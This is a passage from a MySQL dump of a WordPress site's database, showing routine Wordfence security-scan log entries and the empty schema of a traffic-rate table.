additional files at 19.88 per second'),(175,1624417132.706380,2,'info','Scanned contents of 675 additional files at 19.89 per second'),(176,1624417133.709976,2,'info','Scanned contents of 699 additional files at 20.00 per second'),(177,1624417134.735300,2,'info','Scanned contents of 725 additional files at 20.15 per second'),(178,1624417135.736876,2,'info','Scanned contents of 748 additional files at 20.23 per second'),(179,1624417136.835812,2,'info','Scanned contents of 773 additional files at 20.30 per second'),(180,1624417137.859868,2,'info','Scanned contents of 806 additional files at 20.61 per second'),(181,1624417138.863021,2,'info','Scanned contents of 837 additional files at 20.87 per second'),(182,1624417139.886105,2,'info','Scanned contents of 859 additional files at 20.89 per second'),(183,1624417140.082285,2,'info','Scanned contents of 864 additional files at 20.91 per second'),(184,1624417140.092782,2,'info','Asking Wordfence to check URLs against malware list.'),(185,1624417140.111267,2,'info','Checking 1341 host keys against Wordfence scanning servers.'),(186,1624417140.919581,2,'info','Done host key check.'),(187,1624417141.171557,2,'info','Done file contents scan'),(188,1624417141.200912,10,'info','SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),(189,1624417141.251589,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(190,1624417141.319232,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(191,1624417141.334943,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(192,1624417141.422187,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(193,1624417141.746790,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(194,1624417141.774530,2,'info','Checking 98 host keys against Wordfence scanning servers.'),(195,1624417142.459734,2,'info','Done host key check.'),(196,1624417142.470202,2,'info','Done examining URLs'),(197,1624417142.718280,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(198,1624417142.782176,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(199,1624417143.124934,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(200,1624417143.265807,10,'info','SUM_START:Scanning for weak passwords'),(201,1624417143.349877,2,'info','Starting password strength check on 1 user.'),(202,1624417143.460902,10,'info','SUM_ENDOK:Scanning for weak passwords'),(203,1624417143.534875,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(204,1624417148.624792,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(205,1624417148.715959,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(206,1624417149.485684,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(207,1624417149.557596,10,'info','SUM_START:Scanning for suspicious site options'),(208,1624417149.813917,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(209,1624417149.830601,2,'info','Done examining URLs'),(210,1624417150.095986,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(211,1624417150.149370,1,'info','-------------------'),(212,1624417150.167193,2,'info','Wordfence used 18 MB of memory for scan. Server peak memory usage was: 36 MB'),(213,1624417150.188243,1,'info','Scan Complete. Scanned 7531 files, 17 plugins, 31 themes, 8 posts, 0 comments and 1154 URLs in 7 minutes 55 seconds.'),(214,1624417150.217614,10,'info','SUM_FINAL:Scan complete. You have 47 new issues to fix. See below.'),(215,1624447836.102004,10,'info','SUM_PREP:Preparing a new scan.'),(216,1624447836.142196,1,'info','Initiating quick scan'),(217,1624447836.164179,10,'info','SUM_START:Checking Web Application Firewall status'),(218,1624447836.174903,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(219,1624447836.215518,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(220,1624447836.624045,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(221,1624447836.629375,1,'info','-------------------'),(222,1624447836.633932,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(223,1624447836.635976,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(224,1624447836.638089,10,'info','SUM_FINAL:Scan complete. You have 43 new issues to fix. See below.'),(225,1624534391.196239,10,'info','SUM_PREP:Preparing a new scan.'),(226,1624534391.263159,1,'info','Initiating quick scan'),(227,1624534391.304063,10,'info','SUM_START:Checking Web Application Firewall status'),(228,1624534391.324863,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(229,1624534391.376883,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(230,1624534392.383005,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(231,1624534392.429810,1,'info','-------------------'),(232,1624534392.454617,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(233,1624534392.475181,1,'info','Quick Scan Complete. Scanned in 1 second.'),(234,1624534392.495762,10,'info','SUM_FINAL:Scan complete. You have 43 new issues to fix. See below.'),(235,1624620600.772003,10,'info','SUM_PREP:Preparing a new scan.'),(236,1624620600.813544,1,'info','Initiating quick scan'),(237,1624620600.863736,10,'info','SUM_START:Checking Web Application Firewall status'),(238,1624620600.872864,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(239,1624620600.896849,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(240,1624620601.996732,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(241,1624620602.030562,1,'info','-------------------'),(242,1624620602.052415,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 12 MB'),(243,1624620602.070425,1,'info','Quick Scan Complete. Scanned in 2 seconds.'),(244,1624620602.082204,10,'info','SUM_FINAL:Scan complete. You have 43 new issues to fix. See below.');
/*!40000 ALTER TABLE `wp_wfstatus` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wftrafficrates`
--

DROP TABLE IF EXISTS `wp_wftrafficrates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wftrafficrates` (
  `eMin` int(10) unsigned NOT NULL,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
  `hits` int(10) unsigned NOT NULL,
  PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wftrafficrates`
--

LOCK TABLES `wp_wftrafficrates` WRITE;
/*!40000 ALTER TABLE `wp_wftrafficrates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wftrafficrates` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2023-02-01  0:17:23